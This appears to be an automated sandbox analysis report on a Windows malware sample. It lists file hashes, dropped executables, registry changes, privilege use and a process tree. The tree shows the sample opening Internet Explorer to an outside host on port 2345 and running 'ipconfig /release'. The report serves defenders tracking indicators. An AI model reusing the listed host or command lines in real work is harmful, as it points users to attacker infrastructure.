2c8a962969174aced4dae8eac738722552d9cfcf2d9fe1da227db7abcba32b6e

Analysis

max time kernel
149s
max time network
136s
platform
windows7_x64
resource
win7-20231129-en
resource tags

arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system
submitted
25/12/2023, 18:16

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

33d8b78a224a7c7c928a8c58f23aa960.exe
Size

361KB
MD5

33d8b78a224a7c7c928a8c58f23aa960
SHA1

4f88d079b757b57f64bf6053dc9bf589e7ac9789
SHA256

2c8a962969174aced4dae8eac738722552d9cfcf2d9fe1da227db7abcba32b6e
SHA512

2ad68e43e134b4fa4998c73cbdd67c76a592c3acb9d31d71edd1c50f825be1a05f1d795903df217e7820dc569e04af0ad0fe4b00212d050fe99380e0efd8a657
SSDEEP

6144:aflfAsiL4lIJjiJcbI03GBc3ucY5DCSjX:aflfAsiVGjSGecvX

Score

7^/10

Malware Config

Signatures

Executes dropped EXE 64 IoCs

pid	Process
2164	snhfaxsmkecxrpjh.exe
2468	CreateProcess.exe
2600	ztrmgeywrl.exe
2636	CreateProcess.exe
2528	CreateProcess.exe
2760	i_ztrmgeywrl.exe
1484	CreateProcess.exe
2448	geywqljdbv.exe
1188	CreateProcess.exe
944	CreateProcess.exe
2640	i_geywqljdbv.exe
2288	CreateProcess.exe
2416	CreateProcess.exe
2112	CreateProcess.exe
596	CreateProcess.exe
488	i_ywqlidbvpn.exe
1200	CreateProcess.exe
2748	ylidxvqnic.exe
812	CreateProcess.exe
1720	CreateProcess.exe
2500	i_ylidxvqnic.exe
2416	CreateProcess.exe
2964	qlfdxvpkic.exe
1680	CreateProcess.exe
1412	CreateProcess.exe
1424	i_qlfdxvpkic.exe
2432	CreateProcess.exe
340	fdxvpkhcau.exe
616	CreateProcess.exe
3032	CreateProcess.exe
1596	i_fdxvpkhcau.exe
748	CreateProcess.exe
1488	xvpkhczuom.exe
1880	CreateProcess.exe
2856	CreateProcess.exe
1508	i_xvpkhczuom.exe
1748	CreateProcess.exe
1924	xrpkhcwuom.exe
2308	CreateProcess.exe
1600	CreateProcess.exe
2216	i_xrpkhcwuom.exe
2376	CreateProcess.exe
2608	heztrljeyw.exe
2580	CreateProcess.exe
2636	CreateProcess.exe
2828	i_pmhfztrmje.exe
2672	CreateProcess.exe
2608	heztrljeyw.exe
2368	CreateProcess.exe
2000	CreateProcess.exe
2204	i_heztrljeyw.exe
2492	CreateProcess.exe
1732	wrojdbvtoi.exe
2940	CreateProcess.exe
1664	CreateProcess.exe
1960	i_wrojdbvtoi.exe
1484	CreateProcess.exe
2168	trlgdywqli.exe
1780	CreateProcess.exe
900	CreateProcess.exe
1164	i_trlgdywqli.exe
1572	CreateProcess.exe
1196	lgeysqlidx.exe
952	CreateProcess.exe

Loads dropped DLL 43 IoCs

pid	Process
2368	33d8b78a224a7c7c928a8c58f23aa960.exe
2164	snhfaxsmkecxrpjh.exe
2164	snhfaxsmkecxrpjh.exe
2600	ztrmgeywrl.exe
2164	snhfaxsmkecxrpjh.exe
2164	snhfaxsmkecxrpjh.exe
2448	geywqljdbv.exe
2164	snhfaxsmkecxrpjh.exe
2164	snhfaxsmkecxrpjh.exe
2416	CreateProcess.exe
2164	snhfaxsmkecxrpjh.exe
2164	snhfaxsmkecxrpjh.exe
2748	ylidxvqnic.exe
2164	snhfaxsmkecxrpjh.exe
2164	snhfaxsmkecxrpjh.exe
2964	qlfdxvpkic.exe
2164	snhfaxsmkecxrpjh.exe
2164	snhfaxsmkecxrpjh.exe
340	fdxvpkhcau.exe
2164	snhfaxsmkecxrpjh.exe
2164	snhfaxsmkecxrpjh.exe
1488	xvpkhczuom.exe
2164	snhfaxsmkecxrpjh.exe
2164	snhfaxsmkecxrpjh.exe
1924	xrpkhcwuom.exe
2164	snhfaxsmkecxrpjh.exe
2164	snhfaxsmkecxrpjh.exe
2608	heztrljeyw.exe
2164	snhfaxsmkecxrpjh.exe
2164	snhfaxsmkecxrpjh.exe
2608	heztrljeyw.exe
2164	snhfaxsmkecxrpjh.exe
2164	snhfaxsmkecxrpjh.exe
1732	wrojdbvtoi.exe
2164	snhfaxsmkecxrpjh.exe
2164	snhfaxsmkecxrpjh.exe
2168	trlgdywqli.exe
2164	snhfaxsmkecxrpjh.exe
2164	snhfaxsmkecxrpjh.exe
1196	lgeysqlidx.exe
2164	snhfaxsmkecxrpjh.exe
2164	snhfaxsmkecxrpjh.exe
3056	dysqkidxvp.exe

Gathers network information 2 TTPs 20 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command and Scripting Interpreter

T1059

pid	Process
1956	ipconfig.exe
1652	ipconfig.exe
2724	ipconfig.exe
1936	ipconfig.exe
2564	ipconfig.exe
1412	ipconfig.exe
1868	ipconfig.exe
1844	ipconfig.exe
984	ipconfig.exe
2596	ipconfig.exe
3016	ipconfig.exe
1748	ipconfig.exe
2812	ipconfig.exe
2556	ipconfig.exe
2720	ipconfig.exe
1632	ipconfig.exe
320	ipconfig.exe
1504	ipconfig.exe
1516	ipconfig.exe
2456	ipconfig.exe

Modifies Internet Explorer settings 1 TTPs 36 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3470981204-343661084-3367201002-1000\Software\Microsoft\Internet Explorer\IETld\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3470981204-343661084-3367201002-1000\Software\Microsoft\Internet Explorer\LowRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3470981204-343661084-3367201002-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3470981204-343661084-3367201002-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3470981204-343661084-3367201002-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{E6BF4FD1-A404-11EE-BE92-46FC6C3D459E} = "0"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3470981204-343661084-3367201002-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3470981204-343661084-3367201002-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3470981204-343661084-3367201002-1000\Software\Microsoft\Internet Explorer\InternetRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3470981204-343661084-3367201002-1000\Software\Microsoft\Internet Explorer\PageSetup	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3470981204-343661084-3367201002-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3470981204-343661084-3367201002-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3470981204-343661084-3367201002-1000\Software\Microsoft\Internet Explorer\DomainSuggestion	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3470981204-343661084-3367201002-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "409767015"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3470981204-343661084-3367201002-1000\Software\Microsoft\Internet Explorer\IntelliForms	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3470981204-343661084-3367201002-1000\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3470981204-343661084-3367201002-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3470981204-343661084-3367201002-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3470981204-343661084-3367201002-1000\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\FaviconPath = "C:\\Users\\Admin\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\Services\\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3470981204-343661084-3367201002-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000046332ab722508540bf00312f0a24f1200000000002000000000010660000000100002000000091145a6b9ca7b2a1ceed89a75815527f3da501ddad7c69f7eb37dca9f3230d50000000000e800000000200002000000079f2a4c98c1d5e2aa16d091997e6016f2b58b835f0ebc0bc5cbaa9d81984417820000000caf055a94e082736984c3cb87e648e4ba789e5e114b7a14dbd1185f4e5c9d29c400000001352974498cada68a0cf7c4d648075c03147e64c455cab9ab8b5291b35bd3165bb9da7c713b53621471b83c23b31fa45d683864a3c24e56ec10ed08b9bf78831	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3470981204-343661084-3367201002-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = c06ef7bd1138da01	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3470981204-343661084-3367201002-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3470981204-343661084-3367201002-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3470981204-343661084-3367201002-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3470981204-343661084-3367201002-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3470981204-343661084-3367201002-1000\Software\Microsoft\Internet Explorer\SearchScopes	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3470981204-343661084-3367201002-1000\Software\Microsoft\Internet Explorer\Zoom	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3470981204-343661084-3367201002-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3470981204-343661084-3367201002-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3470981204-343661084-3367201002-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3470981204-343661084-3367201002-1000\Software\Microsoft\Internet Explorer\Toolbar	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3470981204-343661084-3367201002-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3470981204-343661084-3367201002-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "2"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3470981204-343661084-3367201002-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000046332ab722508540bf00312f0a24f120000000000200000000001066000000010000200000003dc3d98dfe9b486e67738b06acddb5b7272e8b8be7ce65edbf76e77a284ae979000000000e8000000002000020000000031972d9895010922cb958c413428a8cddf965209909a43406969cf8cbcc880690000000850efa910767b5f50c95abe9122d5f18ffbc9646d6a1284e4563a3463c3b3fe4a97fdcda76d263d20d11484d359804900f0c5ef2e895e385b726ab62f8abc66f841618f76b64b90a8d51399a0fcb2292bb22b28c415eb11ce78fc3231f7feb329af50a43d392ddb7999c178baf80d6b8f0dd4519d983e76126dc35ff94e19ed0cdc02aba2430d910446b025155872aba40000000b9c351aa8108337c00834d7d0d248728a6489cf4d113018379192e2aa53cf000a77cee0dbc427b21ff006dc48257a661daf470995ddfae99fd8d3df612b61237	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3470981204-343661084-3367201002-1000\Software\Microsoft\Internet Explorer\GPU	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3470981204-343661084-3367201002-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3470981204-343661084-3367201002-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1"	iexplore.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2368	33d8b78a224a7c7c928a8c58f23aa960.exe
2368	33d8b78a224a7c7c928a8c58f23aa960.exe
2368	33d8b78a224a7c7c928a8c58f23aa960.exe
2368	33d8b78a224a7c7c928a8c58f23aa960.exe
2368	33d8b78a224a7c7c928a8c58f23aa960.exe
2368	33d8b78a224a7c7c928a8c58f23aa960.exe
2368	33d8b78a224a7c7c928a8c58f23aa960.exe
2368	33d8b78a224a7c7c928a8c58f23aa960.exe
2368	33d8b78a224a7c7c928a8c58f23aa960.exe
2368	33d8b78a224a7c7c928a8c58f23aa960.exe
2368	33d8b78a224a7c7c928a8c58f23aa960.exe
2368	33d8b78a224a7c7c928a8c58f23aa960.exe
2368	33d8b78a224a7c7c928a8c58f23aa960.exe
2368	33d8b78a224a7c7c928a8c58f23aa960.exe
2368	33d8b78a224a7c7c928a8c58f23aa960.exe
2368	33d8b78a224a7c7c928a8c58f23aa960.exe
2368	33d8b78a224a7c7c928a8c58f23aa960.exe
2368	33d8b78a224a7c7c928a8c58f23aa960.exe
2368	33d8b78a224a7c7c928a8c58f23aa960.exe
2368	33d8b78a224a7c7c928a8c58f23aa960.exe
2368	33d8b78a224a7c7c928a8c58f23aa960.exe
2368	33d8b78a224a7c7c928a8c58f23aa960.exe
2368	33d8b78a224a7c7c928a8c58f23aa960.exe
2368	33d8b78a224a7c7c928a8c58f23aa960.exe
2368	33d8b78a224a7c7c928a8c58f23aa960.exe
2368	33d8b78a224a7c7c928a8c58f23aa960.exe
2368	33d8b78a224a7c7c928a8c58f23aa960.exe
2368	33d8b78a224a7c7c928a8c58f23aa960.exe
2164	snhfaxsmkecxrpjh.exe
2164	snhfaxsmkecxrpjh.exe
2164	snhfaxsmkecxrpjh.exe
2164	snhfaxsmkecxrpjh.exe
2164	snhfaxsmkecxrpjh.exe
2164	snhfaxsmkecxrpjh.exe
2164	snhfaxsmkecxrpjh.exe
2600	ztrmgeywrl.exe
2600	ztrmgeywrl.exe
2600	ztrmgeywrl.exe
2600	ztrmgeywrl.exe
2600	ztrmgeywrl.exe
2600	ztrmgeywrl.exe
2600	ztrmgeywrl.exe
2760	i_ztrmgeywrl.exe
2760	i_ztrmgeywrl.exe
2760	i_ztrmgeywrl.exe
2760	i_ztrmgeywrl.exe
2760	i_ztrmgeywrl.exe
2760	i_ztrmgeywrl.exe
2760	i_ztrmgeywrl.exe
2448	geywqljdbv.exe
2448	geywqljdbv.exe
2448	geywqljdbv.exe
2448	geywqljdbv.exe
2448	geywqljdbv.exe
2448	geywqljdbv.exe
2448	geywqljdbv.exe
2640	i_geywqljdbv.exe
2640	i_geywqljdbv.exe
2640	i_geywqljdbv.exe
2640	i_geywqljdbv.exe
2640	i_geywqljdbv.exe
2640	i_geywqljdbv.exe
2640	i_geywqljdbv.exe
2416	CreateProcess.exe

Suspicious behavior: LoadsDriver 14 IoCs

pid	Process
480	Process not Found
480	Process not Found
480	Process not Found
480	Process not Found
480	Process not Found
480	Process not Found
480	Process not Found
480	Process not Found
480	Process not Found
480	Process not Found
480	Process not Found
480	Process not Found
480	Process not Found
480	Process not Found

Suspicious use of AdjustPrivilegeToken 13 IoCs

description	pid	Process
Token: SeDebugPrivilege	2760	i_ztrmgeywrl.exe
Token: SeDebugPrivilege	2640	i_geywqljdbv.exe
Token: SeDebugPrivilege	488	i_ywqlidbvpn.exe
Token: SeDebugPrivilege	2500	i_ylidxvqnic.exe
Token: SeDebugPrivilege	1424	i_qlfdxvpkic.exe
Token: SeDebugPrivilege	1596	i_fdxvpkhcau.exe
Token: SeDebugPrivilege	1508	i_xvpkhczuom.exe
Token: SeDebugPrivilege	2216	i_xrpkhcwuom.exe
Token: SeDebugPrivilege	2828	i_pmhfztrmje.exe
Token: SeDebugPrivilege	2204	i_heztrljeyw.exe
Token: SeDebugPrivilege	1960	i_wrojdbvtoi.exe
Token: SeDebugPrivilege	1164	i_trlgdywqli.exe
Token: SeDebugPrivilege	960	i_lgeysqlidx.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
2984	iexplore.exe

Suspicious use of SetWindowsHookEx 6 IoCs

pid	Process
2984	iexplore.exe
2984	iexplore.exe
636	IEXPLORE.EXE
636	IEXPLORE.EXE
636	IEXPLORE.EXE
636	IEXPLORE.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2368 wrote to memory of 2164	2368	33d8b78a224a7c7c928a8c58f23aa960.exe	30
PID 2368 wrote to memory of 2164	2368	33d8b78a224a7c7c928a8c58f23aa960.exe	30
PID 2368 wrote to memory of 2164	2368	33d8b78a224a7c7c928a8c58f23aa960.exe	30
PID 2368 wrote to memory of 2164	2368	33d8b78a224a7c7c928a8c58f23aa960.exe	30
PID 2368 wrote to memory of 2984	2368	33d8b78a224a7c7c928a8c58f23aa960.exe	29
PID 2368 wrote to memory of 2984	2368	33d8b78a224a7c7c928a8c58f23aa960.exe	29
PID 2368 wrote to memory of 2984	2368	33d8b78a224a7c7c928a8c58f23aa960.exe	29
PID 2368 wrote to memory of 2984	2368	33d8b78a224a7c7c928a8c58f23aa960.exe	29
PID 2984 wrote to memory of 636	2984	iexplore.exe	28
PID 2984 wrote to memory of 636	2984	iexplore.exe	28
PID 2984 wrote to memory of 636	2984	iexplore.exe	28
PID 2984 wrote to memory of 636	2984	iexplore.exe	28
PID 2164 wrote to memory of 2468	2164	snhfaxsmkecxrpjh.exe	36
PID 2164 wrote to memory of 2468	2164	snhfaxsmkecxrpjh.exe	36
PID 2164 wrote to memory of 2468	2164	snhfaxsmkecxrpjh.exe	36
PID 2164 wrote to memory of 2468	2164	snhfaxsmkecxrpjh.exe	36
PID 2600 wrote to memory of 2636	2600	ztrmgeywrl.exe	95
PID 2600 wrote to memory of 2636	2600	ztrmgeywrl.exe	95
PID 2600 wrote to memory of 2636	2600	ztrmgeywrl.exe	95
PID 2600 wrote to memory of 2636	2600	ztrmgeywrl.exe	95
PID 2164 wrote to memory of 2528	2164	snhfaxsmkecxrpjh.exe	38
PID 2164 wrote to memory of 2528	2164	snhfaxsmkecxrpjh.exe	38
PID 2164 wrote to memory of 2528	2164	snhfaxsmkecxrpjh.exe	38
PID 2164 wrote to memory of 2528	2164	snhfaxsmkecxrpjh.exe	38
PID 2164 wrote to memory of 1484	2164	snhfaxsmkecxrpjh.exe	43
PID 2164 wrote to memory of 1484	2164	snhfaxsmkecxrpjh.exe	43
PID 2164 wrote to memory of 1484	2164	snhfaxsmkecxrpjh.exe	43
PID 2164 wrote to memory of 1484	2164	snhfaxsmkecxrpjh.exe	43
PID 2448 wrote to memory of 1188	2448	geywqljdbv.exe	41
PID 2448 wrote to memory of 1188	2448	geywqljdbv.exe	41
PID 2448 wrote to memory of 1188	2448	geywqljdbv.exe	41
PID 2448 wrote to memory of 1188	2448	geywqljdbv.exe	41
PID 2164 wrote to memory of 944	2164	snhfaxsmkecxrpjh.exe	45
PID 2164 wrote to memory of 944	2164	snhfaxsmkecxrpjh.exe	45
PID 2164 wrote to memory of 944	2164	snhfaxsmkecxrpjh.exe	45
PID 2164 wrote to memory of 944	2164	snhfaxsmkecxrpjh.exe	45
PID 2164 wrote to memory of 2288	2164	snhfaxsmkecxrpjh.exe	50
PID 2164 wrote to memory of 2288	2164	snhfaxsmkecxrpjh.exe	50
PID 2164 wrote to memory of 2288	2164	snhfaxsmkecxrpjh.exe	50
PID 2164 wrote to memory of 2288	2164	snhfaxsmkecxrpjh.exe	50
PID 2416 wrote to memory of 2112	2416	CreateProcess.exe	48
PID 2416 wrote to memory of 2112	2416	CreateProcess.exe	48
PID 2416 wrote to memory of 2112	2416	CreateProcess.exe	48
PID 2416 wrote to memory of 2112	2416	CreateProcess.exe	48
PID 2164 wrote to memory of 596	2164	snhfaxsmkecxrpjh.exe	52
PID 2164 wrote to memory of 596	2164	snhfaxsmkecxrpjh.exe	52
PID 2164 wrote to memory of 596	2164	snhfaxsmkecxrpjh.exe	52
PID 2164 wrote to memory of 596	2164	snhfaxsmkecxrpjh.exe	52
PID 2164 wrote to memory of 1200	2164	snhfaxsmkecxrpjh.exe	57
PID 2164 wrote to memory of 1200	2164	snhfaxsmkecxrpjh.exe	57
PID 2164 wrote to memory of 1200	2164	snhfaxsmkecxrpjh.exe	57
PID 2164 wrote to memory of 1200	2164	snhfaxsmkecxrpjh.exe	57
PID 2748 wrote to memory of 812	2748	ylidxvqnic.exe	55
PID 2748 wrote to memory of 812	2748	ylidxvqnic.exe	55
PID 2748 wrote to memory of 812	2748	ylidxvqnic.exe	55
PID 2748 wrote to memory of 812	2748	ylidxvqnic.exe	55
PID 2164 wrote to memory of 1720	2164	snhfaxsmkecxrpjh.exe	59
PID 2164 wrote to memory of 1720	2164	snhfaxsmkecxrpjh.exe	59
PID 2164 wrote to memory of 1720	2164	snhfaxsmkecxrpjh.exe	59
PID 2164 wrote to memory of 1720	2164	snhfaxsmkecxrpjh.exe	59
PID 2164 wrote to memory of 2416	2164	snhfaxsmkecxrpjh.exe	64
PID 2164 wrote to memory of 2416	2164	snhfaxsmkecxrpjh.exe	64
PID 2164 wrote to memory of 2416	2164	snhfaxsmkecxrpjh.exe	64
PID 2164 wrote to memory of 2416	2164	snhfaxsmkecxrpjh.exe	64

C:\Users\Admin\AppData\Local\Temp\33d8b78a224a7c7c928a8c58f23aa960.exe
"C:\Users\Admin\AppData\Local\Temp\33d8b78a224a7c7c928a8c58f23aa960.exe"
1⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2368
- C:\Program Files\Internet Explorer\iexplore.exe
  "C:\Program Files\Internet Explorer\iexplore.exe" http://xytets.com:2345/t.asp?os=home
  2⤵
  - Modifies Internet Explorer settings
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:2984
- C:\Temp\snhfaxsmkecxrpjh.exe
  C:\Temp\snhfaxsmkecxrpjh.exe run
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:2164
- - C:\temp\CreateProcess.exe
    C:\temp\CreateProcess.exe C:\Temp\ztrmgeywrl.exe ups_run
    3⤵
    - Executes dropped EXE
    PID:2468
- - C:\temp\CreateProcess.exe
    C:\temp\CreateProcess.exe C:\Temp\i_ztrmgeywrl.exe ups_ins
    3⤵
    - Executes dropped EXE
    PID:2528
- - C:\temp\CreateProcess.exe
    C:\temp\CreateProcess.exe C:\Temp\geywqljdbv.exe ups_run
    3⤵
    - Executes dropped EXE
    PID:1484
  - - C:\Temp\trlgdywqli.exe
      C:\Temp\trlgdywqli.exe ups_run
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:2168
- - C:\temp\CreateProcess.exe
    C:\temp\CreateProcess.exe C:\Temp\i_geywqljdbv.exe ups_ins
    3⤵
    - Executes dropped EXE
    PID:944
- - C:\temp\CreateProcess.exe
    C:\temp\CreateProcess.exe C:\Temp\ywqlidbvpn.exe ups_run
    3⤵
    - Executes dropped EXE
    PID:2288
- - C:\temp\CreateProcess.exe
    C:\temp\CreateProcess.exe C:\Temp\i_ywqlidbvpn.exe ups_ins
    3⤵
    - Executes dropped EXE
    PID:596
- - C:\temp\CreateProcess.exe
    C:\temp\CreateProcess.exe C:\Temp\ylidxvqnic.exe ups_run
    3⤵
    - Executes dropped EXE
    PID:1200
- - C:\temp\CreateProcess.exe
    C:\temp\CreateProcess.exe C:\Temp\i_ylidxvqnic.exe ups_ins
    3⤵
    - Executes dropped EXE
    PID:1720
- - C:\temp\CreateProcess.exe
    C:\temp\CreateProcess.exe C:\Temp\qlfdxvpkic.exe ups_run
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    PID:2416
  - - C:\Temp\i_dysqkidxvp.exe
      C:\Temp\i_dysqkidxvp.exe ups_ins
      4⤵
      PID:1128
- - C:\temp\CreateProcess.exe
    C:\temp\CreateProcess.exe C:\Temp\i_qlfdxvpkic.exe ups_ins
    3⤵
    - Executes dropped EXE
    PID:1412
- - C:\temp\CreateProcess.exe
    C:\temp\CreateProcess.exe C:\Temp\fdxvpkhcau.exe ups_run
    3⤵
    - Executes dropped EXE
    PID:2432
- - C:\temp\CreateProcess.exe
    C:\temp\CreateProcess.exe C:\Temp\i_fdxvpkhcau.exe ups_ins
    3⤵
    - Executes dropped EXE
    PID:3032
- - C:\temp\CreateProcess.exe
    C:\temp\CreateProcess.exe C:\Temp\xvpkhczuom.exe ups_run
    3⤵
    - Executes dropped EXE
    PID:748
- - C:\temp\CreateProcess.exe
    C:\temp\CreateProcess.exe C:\Temp\i_xvpkhczuom.exe ups_ins
    3⤵
    - Executes dropped EXE
    PID:2856
- - C:\temp\CreateProcess.exe
    C:\temp\CreateProcess.exe C:\Temp\xrpkhcwuom.exe ups_run
    3⤵
    - Executes dropped EXE
    PID:1748
- - C:\temp\CreateProcess.exe
    C:\temp\CreateProcess.exe C:\Temp\i_xrpkhcwuom.exe ups_ins
    3⤵
    - Executes dropped EXE
    PID:1600
- - C:\temp\CreateProcess.exe
    C:\temp\CreateProcess.exe C:\Temp\pmhfztrmje.exe ups_run
    3⤵
    - Executes dropped EXE
    PID:2376
  - - C:\Temp\pmhfztrmje.exe
      C:\Temp\pmhfztrmje.exe ups_run
      4⤵
      PID:2608
    - - C:\temp\CreateProcess.exe
        
        C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release
        5⤵
        Executes dropped EXE
        
        PID:2368
- - C:\temp\CreateProcess.exe
    C:\temp\CreateProcess.exe C:\Temp\i_pmhfztrmje.exe ups_ins
    3⤵
    - Executes dropped EXE
    PID:2636
  - - C:\Temp\i_pmhfztrmje.exe
      C:\Temp\i_pmhfztrmje.exe ups_ins
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      PID:2828
- - C:\temp\CreateProcess.exe
    C:\temp\CreateProcess.exe C:\Temp\heztrljeyw.exe ups_run
    3⤵
    - Executes dropped EXE
    PID:2672
- - C:\temp\CreateProcess.exe
    C:\temp\CreateProcess.exe C:\Temp\i_heztrljeyw.exe ups_ins
    3⤵
    - Executes dropped EXE
    PID:2000
- - C:\temp\CreateProcess.exe
    C:\temp\CreateProcess.exe C:\Temp\wrojdbvtoi.exe ups_run
    3⤵
    - Executes dropped EXE
    PID:2492
- - C:\temp\CreateProcess.exe
    C:\temp\CreateProcess.exe C:\Temp\i_wrojdbvtoi.exe ups_ins
    3⤵
    - Executes dropped EXE
    PID:1664
- - C:\temp\CreateProcess.exe
    C:\temp\CreateProcess.exe C:\Temp\trlgdywqli.exe ups_run
    3⤵
    - Executes dropped EXE
    PID:1484
- - C:\temp\CreateProcess.exe
    C:\temp\CreateProcess.exe C:\Temp\i_trlgdywqli.exe ups_ins
    3⤵
    - Executes dropped EXE
    PID:900
- - C:\temp\CreateProcess.exe
    C:\temp\CreateProcess.exe C:\Temp\lgeysqlidx.exe ups_run
    3⤵
    - Executes dropped EXE
    PID:1572
- - C:\temp\CreateProcess.exe
    C:\temp\CreateProcess.exe C:\Temp\i_lgeysqlidx.exe ups_ins
    3⤵
    PID:2560
- - C:\temp\CreateProcess.exe
    C:\temp\CreateProcess.exe C:\Temp\dysqkidxvp.exe ups_run
    3⤵
    PID:2908
- - C:\temp\CreateProcess.exe
    C:\temp\CreateProcess.exe C:\Temp\i_dysqkidxvp.exe ups_ins
    3⤵
    PID:2416
- - C:\temp\CreateProcess.exe
    C:\temp\CreateProcess.exe C:\Temp\sqkicxvpnh.exe ups_run
    3⤵
    PID:404
- - C:\temp\CreateProcess.exe
    C:\temp\CreateProcess.exe C:\Temp\i_sqkicxvpnh.exe ups_ins
    3⤵
    PID:412
- - C:\temp\CreateProcess.exe
    C:\temp\CreateProcess.exe C:\Temp\sqkfcxvpkh.exe ups_run
    3⤵
    PID:844
  - - C:\Temp\sqkfcxvpkh.exe
      C:\Temp\sqkfcxvpkh.exe ups_run
      4⤵
      PID:572
- - C:\temp\CreateProcess.exe
    C:\temp\CreateProcess.exe C:\Temp\i_sqkfcxvpkh.exe ups_ins
    3⤵
    PID:1620
  - - C:\Temp\i_sqkfcxvpkh.exe
      C:\Temp\i_sqkfcxvpkh.exe ups_ins
      4⤵
      PID:1892
- - C:\temp\CreateProcess.exe
    C:\temp\CreateProcess.exe C:\Temp\kicxupnhcz.exe ups_run
    3⤵
    PID:1488
  - - C:\Temp\kicxupnhcz.exe
      C:\Temp\kicxupnhcz.exe ups_run
      4⤵
      PID:1468
- - C:\temp\CreateProcess.exe
    C:\temp\CreateProcess.exe C:\Temp\i_kicxupnhcz.exe ups_ins
    3⤵
    PID:2072
- - C:\temp\CreateProcess.exe
    C:\temp\CreateProcess.exe C:\Temp\causmhezxr.exe ups_run
    3⤵
    PID:2052
